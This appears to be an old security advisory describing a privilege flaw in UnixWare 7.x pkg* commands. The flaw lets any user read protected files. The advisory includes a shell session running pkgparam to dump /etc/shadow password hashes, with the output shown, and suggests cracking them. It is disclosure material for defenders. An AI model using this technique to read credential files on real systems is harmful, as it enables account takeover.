COMMAND

    pkg*

SYSTEMS AFFECTED

    UnixWare 7.x

PROBLEM

    Brock Tellier found following.  Only UnixWare 7.1 has been tested.
    UnixWare  binaries   gain  additional   privileges  via   standard
    suid/sgid  AND  /etc/security/tcb/privs.   The  majority  of   the
    UnixWare "pkg"  command, such  as pkginfo,  pkgcat, pkgparam, etc,
    are vulnerable to a bug which will allow any user to read any file
    on the system as a result of their additional "dacread" permission
    in the privs file.

    The  dacread  permission   allows  a  process   to  override   the
    Discretionary  Access  Controls  (DAC)  for  read-only operations.
    Basically,  a  process  with  the  dacread  permissions is able to
    bypass the mode bits and ownership on a file, but only for reading
    it.  A process with  dacwrite permissions can bypass mode  bits to
    write to or execute that file.  Brock's pretty sure that the  bugs
    he found in the pkg commands were introduced by their addition  to
    the privs file.   As far as  one can tell,  there is virtually  no
    reason for them to be able to read any file on the system.

    All  around,  this  additional   privilege  thing,  well,   sucks.
    Consider now that the truss(1) command will allow the user to  see
    any file i/o that happens  between a process and the  system since
    it isn't suid/sgid.  Thus, if there is *any* way that you can make
    pkg* read from a  file, even if the  output is never printed,  you
    can examine truss  output to get  the file's contents.   The worst
    offender of pkg* is pkgparam,  which will print the contents  of a
    file to stdout, though Brock has been able to get most of the  pkg
    program to read  from /etc/shadow in  one way or  another and grab
    the contents with truss.

        bash-2.02$ ls -la /bin/pkgparam
        -r-xr-xr-x    1 root     sys          166784 May 21  1999
        /bin/pkgparam
        bash-2.02$ /bin/pkgparam -f /etc/shadow
        Dy0l3OC7XHsj.:10925::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        NP:6445::::::
        *LK*:::::::
        *LK*:::::::
        *LK*:::::::
        BgusHRQZ9MH2U:10878::::::
        *LK*:::::::
        *LK*:::::::
        *LK*:::::::
        *LK*:::::::
        *LK*:::::::
        nv.Xrh2V3vArc:10882::::::
        ozT.yeRe1/dxY:10882::::::
        RinwpQfqabYbc:10928::::::
        bash-2.02$

    Now just concatenate the first field of /etc/passwd with this file
    and run your favorite cracker.

SOLUTION

    Nothing yet.